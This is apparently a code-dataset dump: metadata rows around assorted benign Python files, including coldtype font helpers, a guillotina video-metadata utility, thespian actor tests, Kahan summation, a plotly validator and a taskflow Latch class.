blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bb73a8d6d66d5da10e7f44de054504874ad8a460 | 08f484c61bf303ee2ec78aff9960f4812fe1e839 | /coldtype/helpers.py | 5449040cdd452d951ffbae72f5c94dca7a01bca1 | [
"Apache-2.0"
] | permissive | rohernandezz/coldtype | 02bee08e021be8dfe45328076c512f06ea8f13ae | 724234fce454699a469d17b6c78ae50fa8138169 | refs/heads/main | 2023-07-27T16:09:10.696755 | 2021-09-11T21:17:55 | 2021-09-11T21:17:55 | 405,537,609 | 0 | 0 | Apache-2.0 | 2021-09-12T03:34:29 | 2021-09-12T03:34:28 | null | UTF-8 | Python | false | false | 2,541 | py | from pathlib import Path
from defcon import Font as DefconFont
from coldtype.text.reader import normalize_font_path, StyledString
from coldtype.pens.datpen import DATPens
from coldtype.interpolation import norm, interp_dict, lerp, loopidx
from random import Random
def sibling(root, file):
    """Return the path of *file* placed next to *root* (same parent dir)."""
    return Path(root).parent / file
def raw_ufo(path):
    # Open *path* as a raw defcon Font; the path is normalized via the same
    # helper the styled-text font loader uses.
    return DefconFont(normalize_font_path(path))
def ßhide(el):
    # Viewer helper: swallow *el* so it is not rendered.
    return None
def ßshow(el):
    # Viewer helper counterpart to ßhide: pass *el* through unchanged.
    return el
def cycle_idx(arr, idx):
    """Wrap *idx* into ``arr``: anything below zero maps to the last index,
    anything past the end maps to the first, in-range values pass through."""
    last = len(arr) - 1
    if idx < 0:
        return last
    if idx > last:
        return 0
    return idx
def random_series(start=0, end=1, seed=0, count=5000):
    """Deterministic list of *count* uniform samples in [start, end),
    reproducible for a given *seed*."""
    rng = Random()
    rng.seed(seed)
    span = end - start
    return [start + rng.random() * span for _ in range(count)]
def show_points(pen, style, offcurves=True, filter=lambda i: True):
    """Build index labels (one styled pen per point) for the points of *pen*.

    With offcurves=True every point reported by pen.map_points is labelled;
    otherwise only the final point of each entry in pen.value is labelled.
    *filter* receives the point index and may exclude individual points.
    """
    pt_labels = DATPens()
    if offcurves:
        def labeller(idx, x, y):
            if filter(idx):
                pt_labels.append(StyledString(str(idx), style).pen().translate(x, y))
        pen.map_points(labeller)
    else:
        for idx, (m, pts) in enumerate(pen.value):
            if len(pts) > 0 and filter(idx):
                pt_labels += StyledString(str(idx), style).pen().translate(*pts[-1])
    return pt_labels
# Lazy lookup tables: codepoint -> glyph name, glyph name -> codepoint, and
# glyph name -> third ("class") column of the data file. Filled on first use
# by _populate_glyphs_unis().
_by_uni = None
_by_glyph = None
_class_lookup = None
def _populate_glyphs_unis():
    """Populate the module-level glyph-name/unicode lookup tables from the
    bundled ``assets/glyphNamesToUnicode.txt`` data file.

    Each non-comment line is expected to look like
    ``<glyphName> <hexCodepoint> <class>``.
    """
    global _by_uni
    global _by_glyph
    global _class_lookup
    _by_uni = {}
    _by_glyph = {}
    _class_lookup = {}
    # Removed a dead `if True:` wrapper plus commented-out try/except
    # scaffolding that only added an indentation level.
    lines = (Path(__file__).parent.parent / "assets/glyphNamesToUnicode.txt").read_text().split("\n")
    for line in lines:
        # Skip comments and blank lines (a trailing newline in the data file
        # previously produced an IndexError below).
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")[:3]
        uni = int(parts[1], 16)
        _by_uni[uni] = parts[0]
        _by_glyph[parts[0]] = uni
        _class_lookup[parts[0]] = parts[2]
def uni_to_glyph(u):
    # Glyph name registered for codepoint *u*, or None; tables load lazily.
    if not _by_uni:
        _populate_glyphs_unis()
    return _by_uni.get(u)
def glyph_to_uni(g):
    # Remap a few glyph-name aliases before lookup: comma-accent names are
    # rewritten to their "cedilla" spellings and kgreenlandic to "kra"
    # (presumably matching how the data file names them -- verify).
    if g.lower() in [
        "gcommaaccent",
        "kcommaaccent",
        "lcommaaccent",
        "ncommaaccent",
        "rcommaaccent",
    ]:
        g = g.replace("commaaccent", "cedilla")
    elif g.lower() == "kgreenlandic":
        g = g.replace("greenlandic", "ra")
    if not _by_glyph:
        _populate_glyphs_unis()
    return _by_glyph.get(g)
def glyph_to_class(g):
    """Return the class string (third data-file column) recorded for glyph
    name *g*, loading the lookup tables on first use."""
    # Defect fixed: the return line had dataset-dump metadata fused onto it;
    # reconstructed the clean statement.
    if not _class_lookup:
        _populate_glyphs_unis()
    return _class_lookup.get(g)
"rob.stenson@gmail.com"
] | rob.stenson@gmail.com |
def manage(R, C, r0, c0):
    """Spiral-matrix walk: starting at (r0, c0) on an R x C grid, walk
    clockwise in an expanding spiral and return every in-bounds cell in
    visit order, until all R*C cells have been emitted.

    Defect fixed: the original `def` line was fused with dataset-dump
    metadata; the definition is reconstructed here.
    """
    visited = [[r0, c0]]
    total = R * C
    if total == 1:
        return visited
    step = 1
    while step < 2 * (R + C):
        # Two edges per ring: right then down use `step`; left then up use
        # `step + 1`; the ring then grows by two.
        for dr, dc, length in ((0, 1, step), (1, 0, step),
                               (0, -1, step + 1), (-1, 0, step + 1)):
            for _ in range(length):
                r0 += dr
                c0 += dc
                if 0 <= r0 < R and 0 <= c0 < C:
                    visited.append([r0, c0])
                    if len(visited) == total:
                        return visited
        step += 2
    return visited
# Script driver: read grid size (R, C) and start cell (r0, c0) from stdin,
# one integer per line, then print the spiral visit order.
R = int(input())
C = int(input())
r0 = int(input())
c0 = int(input())
result = manage(R, C, r0, c0)
print(result)
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
6cd50fc250fd30608492a7d43a5d379ded730f9b | ae1e5b78fcbb88225b414fbdaecaa3783ae37fd8 | /guillotina_glex/utility.py | 2587ed35b06a46f6a203c894d716ceb9f9a15e9e | [] | no_license | vangheem/guillotina_glex | d65d7cfce8702a3b31ca5516f001f9bb89b43707 | ef22a7c42191d6a8492e6aceb81273a326eaa6aa | refs/heads/master | 2021-01-06T20:35:35.059172 | 2017-09-05T00:33:22 | 2017-09-05T00:33:22 | 99,527,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,911 | py | import asyncio
import base64
import json
import logging
import os
import aiohttp
from guillotina import app_settings, configure
from guillotina.async import IAsyncUtility
from guillotina.component import getUtility
from guillotina_gcloudstorage.interfaces import IGCloudBlobStore
from guillotina_gcloudstorage.storage import OBJECT_BASE_URL
from .db import DB
# Module logger.
logger = logging.getLogger(__name__)
# Substrings that mark a filename as not-a-movie; such entries are skipped
# before querying OMDb.
_ignored_titles = (
    'workout',
    'pilates',
    'all about',
    'songs',
    'insanity',
    'lesson',
    'disc'
)
# OMDb REST endpoint used for title lookups.
OMDB_URL = 'http://www.omdbapi.com/'
class IGlexUtility(IAsyncUtility):
    """Marker interface for the Glex async utility registered below."""
    pass
@configure.utility(provides=IGlexUtility)
class GlexUtility:
    """Async utility that indexes bucket videos and enriches them with OMDb
    metadata, consumed in the background off an internal queue."""

    def __init__(self, settings=None, loop=None):
        # Bug fix: `settings={}` was a shared mutable default argument.
        self._settings = settings if settings is not None else {}
        self._loop = loop

    async def initialize(self, app=None):
        """Load videos for every configured bucket folder, then loop forever
        consuming queued videos and fetching their OMDb data."""
        self._queue = asyncio.Queue()
        self._db = DB()
        for prefix in app_settings["bucket_folders"]:
            await self.load_videos(prefix)
        while True:
            try:
                video = await self._queue.get()
                await self.get_video_data(video)
            except Exception:
                # Fix: logger.warn is a deprecated alias of logger.warning.
                logger.warning(
                    'error getting video data',
                    exc_info=True)
                await asyncio.sleep(1)
            finally:
                self._queue.task_done()

    async def get_video_data(self, video):
        """Resolve OMDb metadata for *video*, caching the JSON response on
        disk keyed by the base64-encoded video id."""
        filename = video['name'].split('/')[-1]
        video['filename'] = filename
        name = '.'.join(filename.split('.')[:-1]).replace('.', '')
        if not os.path.exists(app_settings['download_folder']):
            os.mkdir(app_settings['download_folder'])
        storage_filename = '{}-info'.format(
            base64.b64encode(video['id'].encode('utf8')).decode('utf8'))
        filepath = os.path.join(app_settings['download_folder'],
                                storage_filename)
        if os.path.exists(filepath):
            with open(filepath) as fi:
                video['data'] = json.loads(fi.read())
                # Fix: the cached-hit log message had no placeholder and
                # always printed "(unknown)"; include the movie name.
                logger.warning(f'found cached data for movie {name}')
                return
        # Skip entries whose names mark them as not-a-movie.
        for ignored in _ignored_titles:
            if ignored in name.lower():
                return
        # Try progressively simpler variants of the name against OMDb.
        tries = [
            name,
            name.replace('_', ' ')
        ]
        for removed in ('-', ':', '('):
            if removed in name:
                tries.append(name.split(removed)[0].strip())
        for movie_name in tries:
            logger.warning(f'searching for movie name {movie_name}')
            async with aiohttp.ClientSession() as session:
                resp = await session.get(OMDB_URL, params={
                    't': movie_name,
                    'apikey': app_settings['omdb_api_key']
                })
                if resp.status == 200:
                    data = await resp.json()
                    if data['Response'] == 'True':
                        # Found a match: cache it and stop trying variants.
                        video['data'] = data
                        with open(filepath, 'w') as fi:
                            fi.write(json.dumps(data))
                        return
                else:
                    data = await resp.text()
                    logger.warning(f'error getting video data for {name}, '
                                   f'status: {resp.status}, text: {data}')
                    return
        # nothing found, write to that effect...
        with open(filepath, 'w') as fi:
            fi.write(json.dumps({'Response': 'False'}))

    async def finalize(self, app=None):
        """Nothing to tear down."""
        pass

    async def get_db(self):
        """Return the shared video database mapping."""
        return await self._db.get()

    async def load_videos(self, prefix='Movies/'):
        """List bucket objects under *prefix* and queue every video file
        (m4v/mov/mp4) for OMDb metadata lookup."""
        db = await self._db.get()
        if 'videos' not in db:
            db['videos'] = {}
        util = getUtility(IGCloudBlobStore)
        async with aiohttp.ClientSession() as session:
            access_token = await util.get_access_token()
            url = '{}/vangheem-media/o'.format(OBJECT_BASE_URL)
            resp = await session.get(url, headers={
                'AUTHORIZATION': 'Bearer %s' % access_token
            }, params={
                'prefix': prefix
            })
            data = await resp.json()
            for video in data['items']:
                filename = video['name']
                # The listing includes the folder object itself; skip it.
                if filename == prefix:
                    continue
                ext = filename.split('.')[-1].lower()
                if ext not in ('m4v', 'mov', 'mp4'):
                    continue
                video = {
                    'name': filename,
                    'id': video['id'],
                    'created': video['timeCreated'],
                    'updated': video['updated'],
                    'link': video['mediaLink'],
                    'size': video['size'],
                    'selfLink': video['selfLink']
                }
                db['videos'][video['id']] = video
                await self._queue.put(video)
            await self._db.save()
| [
"vangheem@gmail.com"
] | vangheem@gmail.com |
b6f5cd268a316233e9b02e99e538aac933b2d87b | 89a3cb6e0625e7ae8d3d4c12bf5214557d344059 | /2-Research_Defense/sample_distribution.py | b70dd6d4e01d8989ed15ce6a6384553f4a8bc803 | [] | no_license | tchlux/VarSys | e5adc802bbf8149bd3584d350bb429c24d4cbdd8 | 313a3029d838520d30ce960fa56a897ba9180037 | refs/heads/master | 2023-07-20T10:58:34.901566 | 2020-09-22T15:37:45 | 2020-09-22T15:37:45 | 108,617,499 | 0 | 0 | null | 2023-07-06T21:13:39 | 2017-10-28T03:44:31 | null | UTF-8 | Python | false | false | 2,247 | py | import numpy as np
from fits import cdf_points, flat_fit, linear_fit, cubic_fit, quintic_fit
from util.plot import Plot
from random import seed, sample
# 1000 evenly spaced percentiles of a large standard-normal sample serve as
# the "population" for all plots below.
values = list(np.percentile(np.random.normal(size=(100000,)),
                            np.linspace(0,100,1000)))
# Reference CDF fit over the full population, and its support interval.
truth = linear_fit(values)
true_min_max = (min(values), max(values))
# Create a visual of some sample distribution approximations.
def make_plot(functions, prename):
    """Plot CDF approximations from *functions*, each fit to a small fixed
    sample of ``values``, then plot the absolute-error distribution of the
    last fit.

    NOTE(review): *prename* is only referenced by the commented-out p.show
    call below, so it is currently unused.
    """
    # Initialize some settings.
    seed(0); k = 10
    pop = sample(values, k)
    x, y = cdf_points(pop)
    styles = [None, "dashdot", "dot", "dash"]
    styles = [None] * 4
    # Create the plot.
    p = Plot("", "x","CDF", font_family="times", font_size=18)
    p.add("Sample", x, y)
    p.add_func("Truth", truth, true_min_max, color=p.color((0,0,0,.3)))
    for f,s in zip(functions, styles):
        name = f.__name__.replace("_"," ").title().split()[0].replace("Flat","EDF")
        # Set the legend properties.
        if "quintic" in name.lower():
            p.add_func(name, f(pop), true_min_max, dash=s, opacity=.8, fill='toprevy')
        else:
            p.add_func(name, f(pop), true_min_max, dash=s, opacity=.8)
    legend = dict(
        xanchor = "center",
        yanchor = "top",
        x = .25,
        y = .8,
        orientation = "v",
        bgcolor="white",
        bordercolor="grey",
        borderwidth=.5
    )
    # Create the plot.
    # p.show(y_range=[-.1, 1.1], x_range=true_min_max, width=400*1.4,
    #        height=300*1.4) #, file_name=prename+"-sample-prediction.html")
    # - remove the stuff from quintic fit
    # - remove error bar plots
    # Fit the errors
    # NOTE(review): `f` below is the last function left over from the loop
    # above, and `legend` above is never used -- confirm this is intended.
    p = Plot("", "Absolute Error","CDF", font_family="times", font_size=18)
    print("Computing errors..")
    fit = f(pop)
    errors = abs(np.linspace(0,1,len(values)) - np.array([fit(v) for v in values]))
    print("Fitting error distribution..")
    fit = linear_fit(errors)
    print("Making plot..")
    p.add_func("Error", fit, [min(errors),max(errors)])
    p.show(width=400*1.4, height=300*1.4)
# Make the two different plots.
# Only the all-fits variant below currently runs; a cubic/quintic-only
# variant is kept commented out for reference.
functions = [flat_fit, linear_fit, cubic_fit, quintic_fit]
make_plot(functions, "fl")
# functions = [cubic_fit, quintic_fit]
# make_plot(functions, "cq")
| [
"thomas.ch.lux@gmail.com"
] | thomas.ch.lux@gmail.com |
1e7d8c52911d6060dd4720aae9d114a1d173594a | 3049bc6a1d8ed3b1dfe7280a551bf14cd7df1d98 | /thespian/test/testSystemMessages.py | 02bc9eaa2c799e5e75d136ac1c33f6e3addaefec | [
"MIT"
] | permissive | liuzhijun/Thespian | a9e159f21af1018fe45cce681390fba4fd28bdae | a536cbeace24ab84659160e2a438ebdd62a891e7 | refs/heads/master | 2021-01-15T12:41:27.137415 | 2016-04-08T01:33:27 | 2016-04-08T01:33:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,343 | py | import unittest
import logging
import time, datetime
import thespian.test.helpers
from thespian.actors import *
from thespian.test import ActorSystemTestCase
class EchoActor(Actor):
    """Actor that echoes every received message back to its sender."""
    def receiveMessage(self, msg, sender):
        logging.info('EchoActor got %s (%s) from %s', msg, type(msg), sender)
        self.send(sender, msg)
class Kill_The_Messenger(Actor):
    """Actor that answers any message by asking the sender to exit."""
    def receiveMessage(self, message, sender):
        self.send(sender, ActorExitRequest())
class FakeSystemMessage(ActorSystemMessage):
    """Stand-in system message used to verify system messages are filtered."""
    pass
# Short ask() timeout so the negative (expect-None) tests fail fast.
smallwait = datetime.timedelta(milliseconds=50)
class TestASimpleSystem(ActorSystemTestCase):
    """Functional checks that plain, system, and exit messages are delivered
    (or filtered out) correctly via tell() and ask() on the simple base."""
    testbase='Simple'
    scope='func'
    def testCreateActorSystem(self):
        pass
    def testSimpleActor(self):
        echo = ActorSystem().createActor(EchoActor)
    def testSimpleMessageTell(self):
        echo = ActorSystem().createActor(EchoActor)
        ActorSystem().tell(echo, 'hello')
        time.sleep(0.02) # allow tell to work before ActorSystem shutdown
    def testSystemMessageTell(self):
        echo = ActorSystem().createActor(EchoActor)
        ActorSystem().tell(echo, FakeSystemMessage())
        time.sleep(0.02) # allow tell to work before ActorSystem shutdown
    def testKillMessageTell(self):
        echo = ActorSystem().createActor(EchoActor)
        ActorSystem().tell(echo, ActorExitRequest())
        time.sleep(0.02) # allow tell to work before ActorSystem shutdown
    def testKillMessageTellKiller(self):
        ktm = ActorSystem().createActor(Kill_The_Messenger)
        ActorSystem().tell(ktm, 'hello')
        ActorSystem().tell(ktm, ActorExitRequest())
        time.sleep(0.02) # allow tell to work before ActorSystem shutdown
    def testSimpleMessageAsk(self):
        echo = ActorSystem().createActor(EchoActor)
        self.assertEqual(ActorSystem().ask(echo, 'hello', smallwait), 'hello')
    def testSystemMessageAsk(self):
        echo = ActorSystem().createActor(EchoActor)
        # SystemMessages are explicitly filtered from being returned
        # via Ask() or Tell(), with the exception of PoisonMessage.
        self.assertIsNone(ActorSystem().ask(echo, FakeSystemMessage(), smallwait))
    def testKillMessageAsk(self):
        echo = ActorSystem().createActor(EchoActor)
        # SystemMessages are explicitly filtered from being returned
        # via Ask() or Tell(), with the exception of PoisonMessage.
        self.assertIsNone(ActorSystem().ask(echo, ActorExitRequest(), smallwait))
    def testKillMessageAskKiller(self):
        ktm = ActorSystem().createActor(Kill_The_Messenger)
        self.assertIsNone(ActorSystem().ask(ktm, 'hello', smallwait))
        self.assertIsNone(ActorSystem().ask(ktm, ActorExitRequest(), smallwait))
class TestMultiprocUDPSystem(TestASimpleSystem):
    """Same suite, run against the multiprocess-UDP system base."""
    testbase='MultiprocUDP'
    def setUp(self):
        self.setSystemBase('multiprocUDPBase')
        super(TestMultiprocUDPSystem, self).setUp()
class TestMultiprocTCPSystem(TestASimpleSystem):
    """Same suite, run against the multiprocess-TCP system base."""
    testbase='MultiprocTCP'
    def setUp(self):
        self.setSystemBase('multiprocTCPBase')
        super(TestMultiprocTCPSystem, self).setUp()
class TestMultiprocQueueSystem(TestASimpleSystem):
    """Same suite, run against the multiprocess-Queue system base."""
    testbase='MultiprocQueue'
    def setUp(self):
        self.setSystemBase('multiprocQueueBase')
        super(TestMultiprocQueueSystem, self).setUp()
| [
"kquick@godaddy.com"
] | kquick@godaddy.com |
# Read three 2D points from stdin (two ints per line) and print the pairwise
# Euclidean distances AB, BC and AC, rounded to two decimals.
# Defects fixed: the first line was fused with dataset-dump metadata and has
# been reconstructed; the distance formula, written out three times, is now
# a single helper.

def _dist(p, q):
    """Euclidean distance between 2D points *p* and *q*."""
    return ((q[0] - p[0]) ** 2 + (q[1] - p[1]) ** 2) ** 0.5

print("Point A(x1,y1) = ",end=" ")
a = [int(x) for x in input().split()][:2]
print("Point B(x2,y2) = ",end=" ")
b = [int(x) for x in input().split()][:2]
print("Point c(x3,y3) = ",end=" ")
c = [int(x) for x in input().split()][:2]
print("Distance AB = ",round(_dist(a, b),2))
print("Distance BC = ",round(_dist(b, c),2))
print("Distance AC = ",round(_dist(a, c),2))
| [
"audiuttarwar2000@gmail.com"
] | audiuttarwar2000@gmail.com |
e4a964c0162eae94bed9279674c41123d3a52262 | db217a42aa96688ce2d257820398fcc57bc1f810 | /gpscraper/admin.py | 81efffeec794a7cb5f214403c71d322afd2b92ba | [] | no_license | ans2human/Google-Play-Store-Scraper | 4a3012c5c22feb8dfd92cb9534f6ade400cb096f | ddf576d9c159c98429643e60fb5a642bbe848d49 | refs/heads/master | 2022-12-10T20:10:01.920280 | 2018-10-13T06:27:04 | 2018-10-13T06:27:04 | 149,260,886 | 1 | 1 | null | 2022-07-06T19:52:11 | 2018-09-18T09:16:37 | Python | UTF-8 | Python | false | false | 263 | py | from django.contrib import admin
from gpscraper.models import AppData, AppSearchIndex
class AppDataAdmin(admin.ModelAdmin):
    """Admin change-list for scraped apps showing the key identifying columns."""
    list_display = ('id', 'name', 'dev_name', 'category')
# Register the scraped-app model with its customized admin, and the search
# index with the default admin.
admin.site.register(AppData, AppDataAdmin)
admin.site.register(AppSearchIndex)
| [
"ans2human@gmail.com"
] | ans2human@gmail.com |
3820e7373bc32531be8713da83fd7a55840bcfc7 | 270363be5ea94d33469fe4271eccb343357d4fa6 | /linalg/kahan/sum.py | 36c6ae09c06c5cab9877e5ad05b987dbbea1f78c | [] | no_license | tkelestemur/learn-linalg | c487389e9802b0223232bcb8c9ec0003cc7df091 | a6e04e903e5c9e00801b56a228c56fd8b8ba8c71 | refs/heads/master | 2023-03-19T05:53:34.407780 | 2021-01-02T13:54:40 | 2021-01-02T14:26:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,436 | py | import numpy as np
class KahanSum:
    """Precise summation of finite-precision floating point numbers [1].

    Reduces numerical error by storing a running compensation term that
    captures lost low-order bits.

    References:
      [1]: https://en.wikipedia.org/wiki/Kahan_summation_algorithm
    """
    def __init__(self):
        """Constructor."""
        self.reset()
    def reset(self):
        """Clears the internal state."""
        # One variable tracks the running sum; the other stores the low-order
        # bits lost to rounding on the most recent addition.
        self._sum = 0
        self._compensation = 0
    def add(self, x):
        """Adds the float x to the summation term."""
        # Re-inject the bits lost on the previous addition before
        # accumulating.
        x += self._compensation
        total = self._sum + x
        # (total - self._sum) is what was actually added; its difference from
        # x is the rounding error to carry into the next call.
        # Bug fix: this previously assigned to `self.compensation` (missing
        # underscore), so the compensation term was never applied. Also
        # renamed the local `sum`, which shadowed the builtin.
        self._compensation = x - (total - self._sum)
        self._sum = total
    def result(self):
        """Returns the compensated sum accumulated so far."""
        return self._sum
def kahan_sum(x, axis=None, keepdims=False):
    """Kahan summation for 1 and 2D arrays.

    Args:
      x: A 1D or 2D array-like object.
      axis: The axis which will be collapsed to perform the summation.
      keepdims: A bool specifying whether to keep the collapsed axis.

    Returns:
      The kahan summation of x.
    """
    # Ensure the array-like object is at most 2D.
    x = np.asarray(x)
    assert x.ndim <= 2, "[!] Only 1D and 2D arrays are currently supported."
    # Sanity check axis args.
    assert axis in (None, 0, 1), "[!] Axis value can only be None, 0 or 1."

    # 1D case.
    if x.ndim == 1:
        return _compensated_sum(x)

    # 2D cases. The previously duplicated per-axis accumulation loops are
    # factored into _compensated_sum.
    num_rows, num_cols = x.shape
    if axis is None:
        # Full reduction: every element, in row-major order (as before).
        return _compensated_sum(x.ravel())
    if axis == 0:
        # Collapse rows: one compensated sum per column.
        result = np.asarray([_compensated_sum(x[:, j]) for j in range(num_cols)])
        return result.reshape([1, num_cols]) if keepdims else result
    # axis == 1 -- collapse columns: one compensated sum per row.
    result = np.asarray([_compensated_sum(x[i, :]) for i in range(num_rows)])
    return result.reshape([num_rows, 1]) if keepdims else result


def _compensated_sum(values):
    """Sum a 1D sequence of floats with a fresh KahanSum accumulator."""
    summation = KahanSum()
    for v in values:
        summation.add(v)
    return summation.result()
| [
"kevinarmandzakka@gmail.com"
] | kevinarmandzakka@gmail.com |
3538acda3d446425f03488c8e3f2348b3350b383 | a46d135ba8fd7bd40f0b7d7a96c72be446025719 | /packages/python/plotly/plotly/validators/treemap/_visible.py | 537d81152ae25e0c4789549c71e0a378ae159bba | [
"MIT"
] | permissive | hugovk/plotly.py | 5e763fe96f225d964c4fcd1dea79dbefa50b4692 | cfad7862594b35965c0e000813bd7805e8494a5b | refs/heads/master | 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 | MIT | 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null | UTF-8 | Python | false | false | 470 | py | import _plotly_utils.basevalidators
class VisibleValidator(_plotly_utils.basevalidators.EnumeratedValidator):
    """Enumerated validator for the `treemap.visible` attribute: accepts
    True, False or "legendonly" unless overridden through kwargs."""
    def __init__(self, plotly_name="visible", parent_name="treemap", **kwargs):
        super(VisibleValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            # Callers may override these defaults via kwargs.
            edit_type=kwargs.pop("edit_type", "calc"),
            values=kwargs.pop("values", [True, False, "legendonly"]),
            **kwargs
        )
| [
"noreply@github.com"
] | hugovk.noreply@github.com |
def printTri(n):
    """Print an n-row number triangle: row i holds the digit i, i times,
    space separated. (For i >= 10, the join splits i's digits individually.)

    Defect fixed: the original `def` line was fused with dataset-dump
    metadata; the definition is reconstructed here.
    """
    for i in range(n):
        row = str(i + 1) * (i + 1)
        print(' '.join(row))
# Script driver: read the triangle height from stdin and print the triangle.
n=int(input("enter range to display number triangle"))
printTri(n)
| [
"vineel2006@gmail.com"
] | vineel2006@gmail.com |
01eab334f8dd405e5b1de91172d26a98b76d39ee | a034d4ba39789e4a351112c46dd04a38180cd06c | /appengine/findit/findit_v2/services/test/build_util_test.py | 85dd03198119d71eff746fb8c2caeb9a58e5112b | [
"BSD-3-Clause"
] | permissive | asdfghjjklllllaaa/infra | 050ad249ab44f264b4e2080aa9537ce74aafb022 | 8f63af54e46194cd29291813f2790ff6e986804d | refs/heads/master | 2023-01-10T21:55:44.811835 | 2019-07-01T14:03:32 | 2019-07-01T14:03:32 | 194,691,941 | 1 | 0 | BSD-3-Clause | 2023-01-07T07:12:37 | 2019-07-01T14:45:29 | Python | UTF-8 | Python | false | false | 1,905 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from buildbucket_proto import common_pb2
from buildbucket_proto.build_pb2 import Build
from buildbucket_proto.build_pb2 import BuilderID
from buildbucket_proto.step_pb2 import Step
from findit_v2.services import build_util
from findit_v2.services.context import Context
from findit_v2.services.failure_type import StepTypeEnum
class BuildUtilTest(unittest.TestCase):
  """Unit tests for findit_v2 build_util helpers."""
  def testGetFailedStepsInBuild(self):
    # One passing and one failing step: only the failure should be returned,
    # classified as a compile step.
    build_id = 8000000000123
    build_number = 123
    builder = BuilderID(project='chromium', bucket='try', builder='linux-rel')
    build = Build(
        id=build_id,
        builder=builder,
        number=build_number,
        status=common_pb2.FAILURE)
    step1 = Step(name='s1', status=common_pb2.SUCCESS)
    step2 = Step(name='compile', status=common_pb2.FAILURE)
    build.steps.extend([step1, step2])
    context = Context(
        luci_project_name='chromium',
        gitiles_host='gitiles.host.com',
        gitiles_project='project/name',
        gitiles_ref='ref/heads/master',
        gitiles_id='git_sha')
    failed_steps = build_util.GetFailedStepsInBuild(context, build)
    self.assertEqual(1, len(failed_steps))
    self.assertEqual('compile', failed_steps[0][0].name)
    self.assertEqual(StepTypeEnum.COMPILE, failed_steps[0][1])
  def testGetAnalyzedBuildIdFromRerunBuild(self):
    # The analyzed build id travels on the rerun build as a string tag.
    analyzed_build_id = 8000000000123
    build = Build(tags=[{
        'key': 'analyzed_build_id',
        'value': str(analyzed_build_id)
    }])
    self.assertEqual(analyzed_build_id,
                     build_util.GetAnalyzedBuildIdFromRerunBuild(build))
  def testGetAnalyzedBuildIdFromRerunBuildNoAnalyzedBuildId(self):
    # Without the tag, no analyzed build id can be recovered.
    self.assertIsNone(build_util.GetAnalyzedBuildIdFromRerunBuild(Build()))
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
c3ff78ade7a48d81ea1bf2007c51af01e08bfb47 | 92e3a6424326bf0b83e4823c3abc2c9d1190cf5e | /scripts/icehouse/opt/stack/taskflow/taskflow/types/latch.py | 0945a286cd816a0b0bdfd456401608455ecb04dd | [
"Apache-2.0"
] | permissive | AnthonyEzeigbo/OpenStackInAction | d6c21cf972ce2b1f58a93a29973534ded965d1ea | ff28cc4ee3c1a8d3bbe477d9d6104d2c6e71bf2e | refs/heads/master | 2023-07-28T05:38:06.120723 | 2020-07-25T15:19:21 | 2020-07-25T15:19:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,432 | py | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
from taskflow.types import timing as tt
class Latch(object):
"""A class that ensures N-arrivals occur before unblocking.
TODO(harlowja): replace with http://bugs.python.org/issue8777 when we no
longer have to support python 2.6 or 2.7 and we can only support 3.2 or
later.
"""
def __init__(self, count):
count = int(count)
if count <= 0:
raise ValueError("Count must be greater than zero")
self._count = count
self._cond = threading.Condition()
@property
def needed(self):
"""Returns how many decrements are needed before latch is released."""
return max(0, self._count)
def countdown(self):
"""Decrements the internal counter due to an arrival."""
self._cond.acquire()
try:
self._count -= 1
if self._count <= 0:
self._cond.notify_all()
finally:
self._cond.release()
def wait(self, timeout=None):
"""Waits until the latch is released.
NOTE(harlowja): if a timeout is provided this function will wait
until that timeout expires, if the latch has been released before the
timeout expires then this will return True, otherwise it will
return False.
"""
w = None
if timeout is not None:
w = tt.StopWatch(timeout).start()
self._cond.acquire()
try:
while self._count > 0:
if w is not None:
if w.expired():
return False
else:
timeout = w.leftover()
self._cond.wait(timeout)
return True
finally:
self._cond.release()
| [
"cody@uky.edu"
] | cody@uky.edu |
